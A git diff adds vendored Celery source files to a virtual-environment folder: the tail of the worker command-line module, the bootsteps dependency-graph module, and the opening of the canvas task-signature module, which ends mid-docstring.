+ value = concurrency.get_implementation(worker_pool) + else: + value = concurrency.get_implementation(value) + + if not value: + value = concurrency.get_implementation(worker_pool) + + return value + + +class Hostname(StringParamType): + """Hostname option.""" + + name = "hostname" + + def convert(self, value, param, ctx): + return host_format(default_nodename(value)) + + +class Autoscale(ParamType): + """Autoscaling parameter.""" + + name = ", " + + def convert(self, value, param, ctx): + value = value.split(',') + + if len(value) > 2: + self.fail("Expected two comma separated integers or one integer." + f"Got {len(value)} instead.") + + if len(value) == 1: + try: + value = (int(value[0]), 0) + except ValueError: + self.fail(f"Expected an integer. Got {value} instead.") + + try: + return tuple(reversed(sorted(map(int, value)))) + except ValueError: + self.fail("Expected two comma separated integers." + f"Got {value.join(',')} instead.") + + +CELERY_BEAT = CeleryBeat() +WORKERS_POOL = WorkersPool() +HOSTNAME = Hostname() +AUTOSCALE = Autoscale() + +C_FAKEFORK = os.environ.get('C_FAKEFORK') + + +def detach(path, argv, logfile=None, pidfile=None, uid=None, + gid=None, umask=None, workdir=None, fake=False, app=None, + executable=None, hostname=None): + """Detach program by argv.""" + fake = 1 if C_FAKEFORK else fake + # `detached()` will attempt to touch the logfile to confirm that error + # messages won't be lost after detaching stdout/err, but this means we need + # to pre-format it rather than relying on `setup_logging_subsystem()` like + # we can elsewhere. + logfile = node_format(logfile, hostname) + with detached(logfile, pidfile, uid, gid, umask, workdir, fake, + after_forkers=False): + try: + if executable is not None: + path = executable + os.execv(path, [path] + argv) + return EX_OK + except Exception: # pylint: disable=broad-except + if app is None: + from celery import current_app + app = current_app + app.log.setup_logging_subsystem( + 'ERROR', logfile, hostname=hostname) + logger.critical("Can't exec %r", ' '.join([path] + argv), + exc_info=True) + return EX_FAILURE + + +@click.command(cls=CeleryDaemonCommand, + context_settings={'allow_extra_args': True}) +@click.option('-n', + '--hostname', + default=host_format(default_nodename(None)), + cls=CeleryOption, + type=HOSTNAME, + help_group="Worker Options", + help="Set custom hostname (e.g., 'w1@%%h'). " + "Expands: %%h (hostname), %%n (name) and %%d, (domain).") +@click.option('-D', + '--detach', + cls=CeleryOption, + is_flag=True, + default=False, + help_group="Worker Options", + help="Start worker as a background process.") +@click.option('-S', + '--statedb', + cls=CeleryOption, + type=click.Path(), + callback=lambda ctx, _, + value: value or ctx.obj.app.conf.worker_state_db, + help_group="Worker Options", + help="Path to the state database. 
The extension '.db' may be " + "appended to the filename.") +@click.option('-l', + '--loglevel', + default='WARNING', + cls=CeleryOption, + type=LOG_LEVEL, + help_group="Worker Options", + help="Logging level.") +@click.option('-O', + '--optimization', + default='default', + cls=CeleryOption, + type=click.Choice(('default', 'fair')), + help_group="Worker Options", + help="Apply optimization profile.") +@click.option('--prefetch-multiplier', + type=int, + metavar="", + callback=lambda ctx, _, + value: value or ctx.obj.app.conf.worker_prefetch_multiplier, + cls=CeleryOption, + help_group="Worker Options", + help="Set custom prefetch multiplier value " + "for this worker instance.") +@click.option('-c', + '--concurrency', + type=int, + metavar="", + callback=lambda ctx, _, + value: value or ctx.obj.app.conf.worker_concurrency, + cls=CeleryOption, + help_group="Pool Options", + help="Number of child processes processing the queue. " + "The default is the number of CPUs available" + " on your system.") +@click.option('-P', + '--pool', + default='prefork', + type=WORKERS_POOL, + cls=CeleryOption, + help_group="Pool Options", + help="Pool implementation.") +@click.option('-E', + '--task-events', + '--events', + is_flag=True, + default=None, + cls=CeleryOption, + help_group="Pool Options", + help="Send task-related events that can be captured by monitors" + " like celery events, celerymon, and others.") +@click.option('--time-limit', + type=float, + cls=CeleryOption, + help_group="Pool Options", + help="Enables a hard time limit " + "(in seconds int/float) for tasks.") +@click.option('--soft-time-limit', + type=float, + cls=CeleryOption, + help_group="Pool Options", + help="Enables a soft time limit " + "(in seconds int/float) for tasks.") +@click.option('--max-tasks-per-child', + type=int, + cls=CeleryOption, + help_group="Pool Options", + help="Maximum number of tasks a pool worker can execute before " + "it's terminated and replaced by a new worker.") +@click.option('--max-memory-per-child', + type=int, + cls=CeleryOption, + help_group="Pool Options", + help="Maximum amount of resident memory, in KiB, that may be " + "consumed by a child process before it will be replaced " + "by a new one. 
If a single task causes a child process " + "to exceed this limit, the task will be completed and " + "the child process will be replaced afterwards.\n" + "Default: no limit.") +@click.option('--purge', + '--discard', + is_flag=True, + cls=CeleryOption, + help_group="Queue Options") +@click.option('--queues', + '-Q', + type=COMMA_SEPARATED_LIST, + cls=CeleryOption, + help_group="Queue Options") +@click.option('--exclude-queues', + '-X', + type=COMMA_SEPARATED_LIST, + cls=CeleryOption, + help_group="Queue Options") +@click.option('--include', + '-I', + type=COMMA_SEPARATED_LIST, + cls=CeleryOption, + help_group="Queue Options") +@click.option('--without-gossip', + is_flag=True, + cls=CeleryOption, + help_group="Features") +@click.option('--without-mingle', + is_flag=True, + cls=CeleryOption, + help_group="Features") +@click.option('--without-heartbeat', + is_flag=True, + cls=CeleryOption, + help_group="Features", ) +@click.option('--heartbeat-interval', + type=int, + cls=CeleryOption, + help_group="Features", ) +@click.option('--autoscale', + type=AUTOSCALE, + cls=CeleryOption, + help_group="Features", ) +@click.option('-B', + '--beat', + type=CELERY_BEAT, + cls=CeleryOption, + is_flag=True, + help_group="Embedded Beat Options") +@click.option('-s', + '--schedule-filename', + '--schedule', + callback=lambda ctx, _, + value: value or ctx.obj.app.conf.beat_schedule_filename, + cls=CeleryOption, + help_group="Embedded Beat Options") +@click.option('--scheduler', + cls=CeleryOption, + help_group="Embedded Beat Options") +@click.pass_context +@handle_preload_options +def worker(ctx, hostname=None, pool_cls=None, app=None, uid=None, gid=None, + loglevel=None, logfile=None, pidfile=None, statedb=None, + **kwargs): + """Start worker instance. + + \b + Examples + -------- + + \b + $ celery --app=proj worker -l INFO + $ celery -A proj worker -l INFO -Q hipri,lopri + $ celery -A proj worker --concurrency=4 + $ celery -A proj worker --concurrency=1000 -P eventlet + $ celery worker --autoscale=10,0 + + """ + try: + app = ctx.obj.app + if ctx.args: + try: + app.config_from_cmdline(ctx.args, namespace='worker') + except (KeyError, ValueError) as e: + # TODO: Improve the error messages + raise click.UsageError( + "Unable to parse extra configuration from command line.\n" + f"Reason: {e}", ctx=ctx) + if kwargs.get('detach', False): + argv = ['-m', 'celery'] + sys.argv[1:] + if '--detach' in argv: + argv.remove('--detach') + if '-D' in argv: + argv.remove('-D') + if "--uid" in argv: + argv.remove('--uid') + if "--gid" in argv: + argv.remove('--gid') + + return detach(sys.executable, + argv, + logfile=logfile, + pidfile=pidfile, + uid=uid, gid=gid, + umask=kwargs.get('umask', None), + workdir=kwargs.get('workdir', None), + app=app, + executable=kwargs.get('executable', None), + hostname=hostname) + + maybe_drop_privileges(uid=uid, gid=gid) + worker = app.Worker( + hostname=hostname, pool_cls=pool_cls, loglevel=loglevel, + logfile=logfile, # node format handled by celery.app.log.setup + pidfile=node_format(pidfile, hostname), + statedb=node_format(statedb, hostname), + no_color=ctx.obj.no_color, + quiet=ctx.obj.quiet, + **kwargs) + worker.start() + ctx.exit(worker.exitcode) + except SecurityError as e: + ctx.obj.error(e.args[0]) + ctx.exit(1) diff --git a/env/Lib/site-packages/celery/bootsteps.py b/env/Lib/site-packages/celery/bootsteps.py new file mode 100644 index 00000000..87856062 --- /dev/null +++ b/env/Lib/site-packages/celery/bootsteps.py @@ -0,0 +1,415 @@ +"""A directed acyclic graph of reusable 
components.""" + +from collections import deque +from threading import Event + +from kombu.common import ignore_errors +from kombu.utils.encoding import bytes_to_str +from kombu.utils.imports import symbol_by_name + +from .utils.graph import DependencyGraph, GraphFormatter +from .utils.imports import instantiate, qualname +from .utils.log import get_logger + +try: + from greenlet import GreenletExit +except ImportError: + IGNORE_ERRORS = () +else: + IGNORE_ERRORS = (GreenletExit,) + +__all__ = ('Blueprint', 'Step', 'StartStopStep', 'ConsumerStep') + +#: States +RUN = 0x1 +CLOSE = 0x2 +TERMINATE = 0x3 + +logger = get_logger(__name__) + + +def _pre(ns, fmt): + return f'| {ns.alias}: {fmt}' + + +def _label(s): + return s.name.rsplit('.', 1)[-1] + + +class StepFormatter(GraphFormatter): + """Graph formatter for :class:`Blueprint`.""" + + blueprint_prefix = '⧉' + conditional_prefix = '∘' + blueprint_scheme = { + 'shape': 'parallelogram', + 'color': 'slategray4', + 'fillcolor': 'slategray3', + } + + def label(self, step): + return step and '{}{}'.format( + self._get_prefix(step), + bytes_to_str( + (step.label or _label(step)).encode('utf-8', 'ignore')), + ) + + def _get_prefix(self, step): + if step.last: + return self.blueprint_prefix + if step.conditional: + return self.conditional_prefix + return '' + + def node(self, obj, **attrs): + scheme = self.blueprint_scheme if obj.last else self.node_scheme + return self.draw_node(obj, scheme, attrs) + + def edge(self, a, b, **attrs): + if a.last: + attrs.update(arrowhead='none', color='darkseagreen3') + return self.draw_edge(a, b, self.edge_scheme, attrs) + + +class Blueprint: + """Blueprint containing bootsteps that can be applied to objects. + + Arguments: + steps Sequence[Union[str, Step]]: List of steps. + name (str): Set explicit name for this blueprint. + on_start (Callable): Optional callback applied after blueprint start. + on_close (Callable): Optional callback applied before blueprint close. + on_stopped (Callable): Optional callback applied after + blueprint stopped. 
+ """ + + GraphFormatter = StepFormatter + + name = None + state = None + started = 0 + default_steps = set() + state_to_name = { + 0: 'initializing', + RUN: 'running', + CLOSE: 'closing', + TERMINATE: 'terminating', + } + + def __init__(self, steps=None, name=None, + on_start=None, on_close=None, on_stopped=None): + self.name = name or self.name or qualname(type(self)) + self.types = set(steps or []) | set(self.default_steps) + self.on_start = on_start + self.on_close = on_close + self.on_stopped = on_stopped + self.shutdown_complete = Event() + self.steps = {} + + def start(self, parent): + self.state = RUN + if self.on_start: + self.on_start() + for i, step in enumerate(s for s in parent.steps if s is not None): + self._debug('Starting %s', step.alias) + self.started = i + 1 + step.start(parent) + logger.debug('^-- substep ok') + + def human_state(self): + return self.state_to_name[self.state or 0] + + def info(self, parent): + info = {} + for step in parent.steps: + info.update(step.info(parent) or {}) + return info + + def close(self, parent): + if self.on_close: + self.on_close() + self.send_all(parent, 'close', 'closing', reverse=False) + + def restart(self, parent, method='stop', + description='restarting', propagate=False): + self.send_all(parent, method, description, propagate=propagate) + + def send_all(self, parent, method, + description=None, reverse=True, propagate=True, args=()): + description = description or method.replace('_', ' ') + steps = reversed(parent.steps) if reverse else parent.steps + for step in steps: + if step: + fun = getattr(step, method, None) + if fun is not None: + self._debug('%s %s...', + description.capitalize(), step.alias) + try: + fun(parent, *args) + except Exception as exc: # pylint: disable=broad-except + if propagate: + raise + logger.exception( + 'Error on %s %s: %r', description, step.alias, exc) + + def stop(self, parent, close=True, terminate=False): + what = 'terminating' if terminate else 'stopping' + if self.state in (CLOSE, TERMINATE): + return + + if self.state != RUN or self.started != len(parent.steps): + # Not fully started, can safely exit. + self.state = TERMINATE + self.shutdown_complete.set() + return + self.close(parent) + self.state = CLOSE + + self.restart( + parent, 'terminate' if terminate else 'stop', + description=what, propagate=False, + ) + + if self.on_stopped: + self.on_stopped() + self.state = TERMINATE + self.shutdown_complete.set() + + def join(self, timeout=None): + try: + # Will only get here if running green, + # makes sure all greenthreads have exited. + self.shutdown_complete.wait(timeout=timeout) + except IGNORE_ERRORS: + pass + + def apply(self, parent, **kwargs): + """Apply the steps in this blueprint to an object. + + This will apply the ``__init__`` and ``include`` methods + of each step, with the object as argument:: + + step = Step(obj) + ... + step.include(obj) + + For :class:`StartStopStep` the services created + will also be added to the objects ``steps`` attribute. 
+ """ + self._debug('Preparing bootsteps.') + order = self.order = [] + steps = self.steps = self.claim_steps() + + self._debug('Building graph...') + for S in self._finalize_steps(steps): + step = S(parent, **kwargs) + steps[step.name] = step + order.append(step) + self._debug('New boot order: {%s}', + ', '.join(s.alias for s in self.order)) + for step in order: + step.include(parent) + return self + + def connect_with(self, other): + self.graph.adjacent.update(other.graph.adjacent) + self.graph.add_edge(type(other.order[0]), type(self.order[-1])) + + def __getitem__(self, name): + return self.steps[name] + + def _find_last(self): + return next((C for C in self.steps.values() if C.last), None) + + def _firstpass(self, steps): + for step in steps.values(): + step.requires = [symbol_by_name(dep) for dep in step.requires] + stream = deque(step.requires for step in steps.values()) + while stream: + for node in stream.popleft(): + node = symbol_by_name(node) + if node.name not in self.steps: + steps[node.name] = node + stream.append(node.requires) + + def _finalize_steps(self, steps): + last = self._find_last() + self._firstpass(steps) + it = ((C, C.requires) for C in steps.values()) + G = self.graph = DependencyGraph( + it, formatter=self.GraphFormatter(root=last), + ) + if last: + for obj in G: + if obj != last: + G.add_edge(last, obj) + try: + return G.topsort() + except KeyError as exc: + raise KeyError('unknown bootstep: %s' % exc) + + def claim_steps(self): + return dict(self.load_step(step) for step in self.types) + + def load_step(self, step): + step = symbol_by_name(step) + return step.name, step + + def _debug(self, msg, *args): + return logger.debug(_pre(self, msg), *args) + + @property + def alias(self): + return _label(self) + + +class StepType(type): + """Meta-class for steps.""" + + name = None + requires = None + + def __new__(cls, name, bases, attrs): + module = attrs.get('__module__') + qname = f'{module}.{name}' if module else name + attrs.update( + __qualname__=qname, + name=attrs.get('name') or qname, + ) + return super().__new__(cls, name, bases, attrs) + + def __str__(cls): + return cls.name + + def __repr__(cls): + return 'step:{0.name}{{{0.requires!r}}}'.format(cls) + + +class Step(metaclass=StepType): + """A Bootstep. + + The :meth:`__init__` method is called when the step + is bound to a parent object, and can as such be used + to initialize attributes in the parent object at + parent instantiation-time. + """ + + #: Optional step name, will use ``qualname`` if not specified. + name = None + + #: Optional short name used for graph outputs and in logs. + label = None + + #: Set this to true if the step is enabled based on some condition. + conditional = False + + #: List of other steps that that must be started before this step. + #: Note that all dependencies must be in the same blueprint. + requires = () + + #: This flag is reserved for the workers Consumer, + #: since it is required to always be started last. + #: There can only be one object marked last + #: in every blueprint. + last = False + + #: This provides the default for :meth:`include_if`. + enabled = True + + def __init__(self, parent, **kwargs): + pass + + def include_if(self, parent): + """Return true if bootstep should be included. + + You can define this as an optional predicate that decides whether + this step should be created. 
+ """ + return self.enabled + + def instantiate(self, name, *args, **kwargs): + return instantiate(name, *args, **kwargs) + + def _should_include(self, parent): + if self.include_if(parent): + return True, self.create(parent) + return False, None + + def include(self, parent): + return self._should_include(parent)[0] + + def create(self, parent): + """Create the step.""" + + def __repr__(self): + return f'' + + @property + def alias(self): + return self.label or _label(self) + + def info(self, obj): + pass + + +class StartStopStep(Step): + """Bootstep that must be started and stopped in order.""" + + #: Optional obj created by the :meth:`create` method. + #: This is used by :class:`StartStopStep` to keep the + #: original service object. + obj = None + + def start(self, parent): + if self.obj: + return self.obj.start() + + def stop(self, parent): + if self.obj: + return self.obj.stop() + + def close(self, parent): + pass + + def terminate(self, parent): + if self.obj: + return getattr(self.obj, 'terminate', self.obj.stop)() + + def include(self, parent): + inc, ret = self._should_include(parent) + if inc: + self.obj = ret + parent.steps.append(self) + return inc + + +class ConsumerStep(StartStopStep): + """Bootstep that starts a message consumer.""" + + requires = ('celery.worker.consumer:Connection',) + consumers = None + + def get_consumers(self, channel): + raise NotImplementedError('missing get_consumers') + + def start(self, c): + channel = c.connection.channel() + self.consumers = self.get_consumers(channel) + for consumer in self.consumers or []: + consumer.consume() + + def stop(self, c): + self._close(c, True) + + def shutdown(self, c): + self._close(c, False) + + def _close(self, c, cancel_consumers=True): + channels = set() + for consumer in self.consumers or []: + if cancel_consumers: + ignore_errors(c.connection, consumer.cancel) + if consumer.channel: + channels.add(consumer.channel) + for channel in channels: + ignore_errors(c.connection, channel.close) diff --git a/env/Lib/site-packages/celery/canvas.py b/env/Lib/site-packages/celery/canvas.py new file mode 100644 index 00000000..a4007f0a --- /dev/null +++ b/env/Lib/site-packages/celery/canvas.py @@ -0,0 +1,2394 @@ +"""Composing task work-flows. + +.. seealso: + + You should import these from :mod:`celery` and not this module. 
+""" + +import itertools +import operator +import warnings +from abc import ABCMeta, abstractmethod +from collections import deque +from collections.abc import MutableSequence +from copy import deepcopy +from functools import partial as _partial +from functools import reduce +from operator import itemgetter +from types import GeneratorType + +from kombu.utils.functional import fxrange, reprcall +from kombu.utils.objects import cached_property +from kombu.utils.uuid import uuid +from vine import barrier + +from celery._state import current_app +from celery.exceptions import CPendingDeprecationWarning +from celery.result import GroupResult, allow_join_result +from celery.utils import abstract +from celery.utils.collections import ChainMap +from celery.utils.functional import _regen +from celery.utils.functional import chunks as _chunks +from celery.utils.functional import is_list, maybe_list, regen, seq_concat_item, seq_concat_seq +from celery.utils.objects import getitem_property +from celery.utils.text import remove_repeating_from_task, truncate + +__all__ = ( + 'Signature', 'chain', 'xmap', 'xstarmap', 'chunks', + 'group', 'chord', 'signature', 'maybe_signature', +) + + +def maybe_unroll_group(group): + """Unroll group with only one member. + This allows treating a group of a single task as if it + was a single task without pre-knowledge.""" + # Issue #1656 + try: + size = len(group.tasks) + except TypeError: + try: + size = group.tasks.__length_hint__() + except (AttributeError, TypeError): + return group + else: + return list(group.tasks)[0] if size == 1 else group + else: + return group.tasks[0] if size == 1 else group + + +def task_name_from(task): + return getattr(task, 'name', task) + + +def _stamp_regen_task(task, visitor, append_stamps, **headers): + """When stamping a sequence of tasks created by a generator, + we use this function to stamp each task in the generator + without exhausting it.""" + + task.stamp(visitor, append_stamps, **headers) + return task + + +def _merge_dictionaries(d1, d2, aggregate_duplicates=True): + """Merge two dictionaries recursively into the first one. + + Example: + >>> d1 = {'dict': {'a': 1}, 'list': [1, 2], 'tuple': (1, 2)} + >>> d2 = {'dict': {'b': 2}, 'list': [3, 4], 'set': {'a', 'b'}} + >>> _merge_dictionaries(d1, d2) + + d1 will be modified to: { + 'dict': {'a': 1, 'b': 2}, + 'list': [1, 2, 3, 4], + 'tuple': (1, 2), + 'set': {'a', 'b'} + } + + Arguments: + d1 (dict): Dictionary to merge into. + d2 (dict): Dictionary to merge from. + aggregate_duplicates (bool): + If True, aggregate duplicated items (by key) into a list of all values in d1 in the same key. + If False, duplicate keys will be taken from d2 and override the value in d1. + """ + if not d2: + return + + for key, value in d1.items(): + if key in d2: + if isinstance(value, dict): + _merge_dictionaries(d1[key], d2[key]) + else: + if isinstance(value, (int, float, str)): + d1[key] = [value] if aggregate_duplicates else value + if isinstance(d2[key], list) and isinstance(d1[key], list): + d1[key].extend(d2[key]) + elif aggregate_duplicates: + if d1[key] is None: + d1[key] = [] + else: + d1[key] = list(d1[key]) + d1[key].append(d2[key]) + for key, value in d2.items(): + if key not in d1: + d1[key] = value + + +class StampingVisitor(metaclass=ABCMeta): + """Stamping API. A class that provides a stamping API possibility for + canvas primitives. If you want to implement stamping behavior for + a canvas primitive override method that represents it. 
+ """ + + def on_group_start(self, group, **headers) -> dict: + """Method that is called on group stamping start. + + Arguments: + group (group): Group that is stamped. + headers (Dict): Partial headers that could be merged with existing headers. + Returns: + Dict: headers to update. + """ + return {} + + def on_group_end(self, group, **headers) -> None: + """Method that is called on group stamping end. + + Arguments: + group (group): Group that is stamped. + headers (Dict): Partial headers that could be merged with existing headers. + """ + pass + + def on_chain_start(self, chain, **headers) -> dict: + """Method that is called on chain stamping start. + + Arguments: + chain (chain): Chain that is stamped. + headers (Dict): Partial headers that could be merged with existing headers. + Returns: + Dict: headers to update. + """ + return {} + + def on_chain_end(self, chain, **headers) -> None: + """Method that is called on chain stamping end. + + Arguments: + chain (chain): Chain that is stamped. + headers (Dict): Partial headers that could be merged with existing headers. + """ + pass + + @abstractmethod + def on_signature(self, sig, **headers) -> dict: + """Method that is called on signature stamping. + + Arguments: + sig (Signature): Signature that is stamped. + headers (Dict): Partial headers that could be merged with existing headers. + Returns: + Dict: headers to update. + """ + + def on_chord_header_start(self, sig, **header) -> dict: + """Method that is called on сhord header stamping start. + + Arguments: + sig (chord): chord that is stamped. + headers (Dict): Partial headers that could be merged with existing headers. + Returns: + Dict: headers to update. + """ + if not isinstance(sig.tasks, group): + sig.tasks = group(sig.tasks) + return self.on_group_start(sig.tasks, **header) + + def on_chord_header_end(self, sig, **header) -> None: + """Method that is called on сhord header stamping end. + + Arguments: + sig (chord): chord that is stamped. + headers (Dict): Partial headers that could be merged with existing headers. + """ + self.on_group_end(sig.tasks, **header) + + def on_chord_body(self, sig, **header) -> dict: + """Method that is called on chord body stamping. + + Arguments: + sig (chord): chord that is stamped. + headers (Dict): Partial headers that could be merged with existing headers. + Returns: + Dict: headers to update. + """ + return {} + + def on_callback(self, callback, **header) -> dict: + """Method that is called on callback stamping. + + Arguments: + callback (Signature): callback that is stamped. + headers (Dict): Partial headers that could be merged with existing headers. + Returns: + Dict: headers to update. + """ + return {} + + def on_errback(self, errback, **header) -> dict: + """Method that is called on errback stamping. + + Arguments: + errback (Signature): errback that is stamped. + headers (Dict): Partial headers that could be merged with existing headers. + Returns: + Dict: headers to update. + """ + return {} + + +@abstract.CallableSignature.register +class Signature(dict): + """Task Signature. + + Class that wraps the arguments and execution options + for a single task invocation. + + Used as the parts in a :class:`group` and other constructs, + or to pass tasks around as callbacks while being compatible + with serializers with a strict type subset. + + Signatures can also be created from tasks: + + - Using the ``.signature()`` method that has the same signature + as ``Task.apply_async``: + + .. 
code-block:: pycon + + >>> add.signature(args=(1,), kwargs={'kw': 2}, options={}) + + - or the ``.s()`` shortcut that works for star arguments: + + .. code-block:: pycon + + >>> add.s(1, kw=2) + + - the ``.s()`` shortcut does not allow you to specify execution options + but there's a chaining `.set` method that returns the signature: + + .. code-block:: pycon + + >>> add.s(2, 2).set(countdown=10).set(expires=30).delay() + + Note: + You should use :func:`~celery.signature` to create new signatures. + The ``Signature`` class is the type returned by that function and + should be used for ``isinstance`` checks for signatures. + + See Also: + :ref:`guide-canvas` for the complete guide. + + Arguments: + task (Union[Type[celery.app.task.Task], str]): Either a task + class/instance, or the name of a task. + args (Tuple): Positional arguments to apply. + kwargs (Dict): Keyword arguments to apply. + options (Dict): Additional options to :meth:`Task.apply_async`. + + Note: + If the first argument is a :class:`dict`, the other + arguments will be ignored and the values in the dict will be used + instead:: + + >>> s = signature('tasks.add', args=(2, 2)) + >>> signature(s) + {'task': 'tasks.add', args=(2, 2), kwargs={}, options={}} + """ + + TYPES = {} + _app = _type = None + # The following fields must not be changed during freezing/merging because + # to do so would disrupt completion of parent tasks + _IMMUTABLE_OPTIONS = {"group_id", "stamped_headers"} + + @classmethod + def register_type(cls, name=None): + """Register a new type of signature. + Used as a class decorator, for example: + >>> @Signature.register_type() + >>> class mysig(Signature): + >>> pass + """ + def _inner(subclass): + cls.TYPES[name or subclass.__name__] = subclass + return subclass + + return _inner + + @classmethod + def from_dict(cls, d, app=None): + """Create a new signature from a dict. + Subclasses can override this method to customize how are + they created from a dict. + """ + typ = d.get('subtask_type') + if typ: + target_cls = cls.TYPES[typ] + if target_cls is not cls: + return target_cls.from_dict(d, app=app) + return Signature(d, app=app) + + def __init__(self, task=None, args=None, kwargs=None, options=None, + type=None, subtask_type=None, immutable=False, + app=None, **ex): + self._app = app + + if isinstance(task, dict): + super().__init__(task) # works like dict(d) + else: + # Also supports using task class/instance instead of string name. + try: + task_name = task.name + except AttributeError: + task_name = task + else: + self._type = task + + super().__init__( + task=task_name, args=tuple(args or ()), + kwargs=kwargs or {}, + options=dict(options or {}, **ex), + subtask_type=subtask_type, + immutable=immutable, + ) + + def __call__(self, *partial_args, **partial_kwargs): + """Call the task directly (in the current process).""" + args, kwargs, _ = self._merge(partial_args, partial_kwargs, None) + return self.type(*args, **kwargs) + + def delay(self, *partial_args, **partial_kwargs): + """Shortcut to :meth:`apply_async` using star arguments.""" + return self.apply_async(partial_args, partial_kwargs) + + def apply(self, args=None, kwargs=None, **options): + """Call task locally. + + Same as :meth:`apply_async` but executed the task inline instead + of sending a task message. + """ + args = args if args else () + kwargs = kwargs if kwargs else {} + # Extra options set to None are dismissed + options = {k: v for k, v in options.items() if v is not None} + # For callbacks: extra args are prepended to the stored args. 
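+        # Illustrative behaviour (not part of the original source): for
+        #   add.s(2, 2).apply((4,))
+        # the partial arg 4 is prepended by _merge(), so the task runs
+        # locally as add(4, 2, 2).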
+ args, kwargs, options = self._merge(args, kwargs, options) + return self.type.apply(args, kwargs, **options) + + def apply_async(self, args=None, kwargs=None, route_name=None, **options): + """Apply this task asynchronously. + + Arguments: + args (Tuple): Partial args to be prepended to the existing args. + kwargs (Dict): Partial kwargs to be merged with existing kwargs. + options (Dict): Partial options to be merged + with existing options. + + Returns: + ~@AsyncResult: promise of future evaluation. + + See also: + :meth:`~@Task.apply_async` and the :ref:`guide-calling` guide. + """ + args = args if args else () + kwargs = kwargs if kwargs else {} + # Extra options set to None are dismissed + options = {k: v for k, v in options.items() if v is not None} + try: + _apply = self._apply_async + except IndexError: # pragma: no cover + # no tasks for chain, etc to find type + return + # For callbacks: extra args are prepended to the stored args. + if args or kwargs or options: + args, kwargs, options = self._merge(args, kwargs, options) + else: + args, kwargs, options = self.args, self.kwargs, self.options + # pylint: disable=too-many-function-args + # Borks on this, as it's a property + return _apply(args, kwargs, **options) + + def _merge(self, args=None, kwargs=None, options=None, force=False): + """Merge partial args/kwargs/options with existing ones. + + If the signature is immutable and ``force`` is False, the existing + args/kwargs will be returned as-is and only the options will be merged. + + Stamped headers are considered immutable and will not be merged regardless. + + Arguments: + args (Tuple): Partial args to be prepended to the existing args. + kwargs (Dict): Partial kwargs to be merged with existing kwargs. + options (Dict): Partial options to be merged with existing options. + force (bool): If True, the args/kwargs will be merged even if the signature is + immutable. The stamped headers are not affected by this option and will not + be merged regardless. + + Returns: + Tuple: (args, kwargs, options) + """ + args = args if args else () + kwargs = kwargs if kwargs else {} + if options is not None: + # We build a new options dictionary where values in `options` + # override values in `self.options` except for keys which are + # noted as being immutable (unrelated to signature immutability) + # implying that allowing their value to change would stall tasks + immutable_options = self._IMMUTABLE_OPTIONS + if "stamped_headers" in self.options: + immutable_options = self._IMMUTABLE_OPTIONS.union(set(self.options.get("stamped_headers", []))) + # merge self.options with options without overriding stamped headers from self.options + new_options = {**self.options, **{ + k: v for k, v in options.items() + if k not in immutable_options or k not in self.options + }} + else: + new_options = self.options + if self.immutable and not force: + return (self.args, self.kwargs, new_options) + return (tuple(args) + tuple(self.args) if args else self.args, + dict(self.kwargs, **kwargs) if kwargs else self.kwargs, + new_options) + + def clone(self, args=None, kwargs=None, **opts): + """Create a copy of this signature. + + Arguments: + args (Tuple): Partial args to be prepended to the existing args. + kwargs (Dict): Partial kwargs to be merged with existing kwargs. + options (Dict): Partial options to be merged with + existing options. + """ + args = args if args else () + kwargs = kwargs if kwargs else {} + # need to deepcopy options so origins links etc. is not modified. 
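+        # Illustrative sketch (not part of the original source):
+        #   sig = add.s(2, 2).set(countdown=10)
+        #   copy = sig.clone((4,))   # args become (4, 2, 2); options are
+        #                            # deep-copied, so later .link()/.set()
+        #                            # calls on the copy do not leak into sig.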
+ if args or kwargs or opts: + args, kwargs, opts = self._merge(args, kwargs, opts) + else: + args, kwargs, opts = self.args, self.kwargs, self.options + signature = Signature.from_dict({'task': self.task, + 'args': tuple(args), + 'kwargs': kwargs, + 'options': deepcopy(opts), + 'subtask_type': self.subtask_type, + 'immutable': self.immutable}, + app=self._app) + signature._type = self._type + return signature + + partial = clone + + def freeze(self, _id=None, group_id=None, chord=None, + root_id=None, parent_id=None, group_index=None): + """Finalize the signature by adding a concrete task id. + + The task won't be called and you shouldn't call the signature + twice after freezing it as that'll result in two task messages + using the same task id. + + The arguments are used to override the signature's headers during + freezing. + + Arguments: + _id (str): Task id to use if it didn't already have one. + New UUID is generated if not provided. + group_id (str): Group id to use if it didn't already have one. + chord (Signature): Chord body when freezing a chord header. + root_id (str): Root id to use. + parent_id (str): Parent id to use. + group_index (int): Group index to use. + + Returns: + ~@AsyncResult: promise of future evaluation. + """ + # pylint: disable=redefined-outer-name + # XXX chord is also a class in outer scope. + opts = self.options + try: + # if there is already an id for this task, return it + tid = opts['task_id'] + except KeyError: + # otherwise, use the _id sent to this function, falling back on a generated UUID + tid = opts['task_id'] = _id or uuid() + if root_id: + opts['root_id'] = root_id + if parent_id: + opts['parent_id'] = parent_id + if 'reply_to' not in opts: + # fall back on unique ID for this thread in the app + opts['reply_to'] = self.app.thread_oid + if group_id and "group_id" not in opts: + opts['group_id'] = group_id + if chord: + opts['chord'] = chord + if group_index is not None: + opts['group_index'] = group_index + # pylint: disable=too-many-function-args + # Borks on this, as it's a property. + return self.AsyncResult(tid) + + _freeze = freeze + + def replace(self, args=None, kwargs=None, options=None): + """Replace the args, kwargs or options set for this signature. + + These are only replaced if the argument for the section is + not :const:`None`. + """ + signature = self.clone() + if args is not None: + signature.args = args + if kwargs is not None: + signature.kwargs = kwargs + if options is not None: + signature.options = options + return signature + + def set(self, immutable=None, **options): + """Set arbitrary execution options (same as ``.options.update(…)``). + + Returns: + Signature: This is a chaining method call + (i.e., it will return ``self``). + """ + if immutable is not None: + self.set_immutable(immutable) + self.options.update(options) + return self + + def set_immutable(self, immutable): + self.immutable = immutable + + def _stamp_headers(self, visitor_headers=None, append_stamps=False, self_headers=True, **headers): + """Collect all stamps from visitor, headers and self, + and return an idempotent dictionary of stamps. + + .. versionadded:: 5.3 + + Arguments: + visitor_headers (Dict): Stamps from a visitor method. + append_stamps (bool): + If True, duplicated stamps will be appended to a list. + If False, duplicated stamps will be replaced by the last stamp. + self_headers (bool): + If True, stamps from self.options will be added. + If False, stamps from self.options will be ignored. 
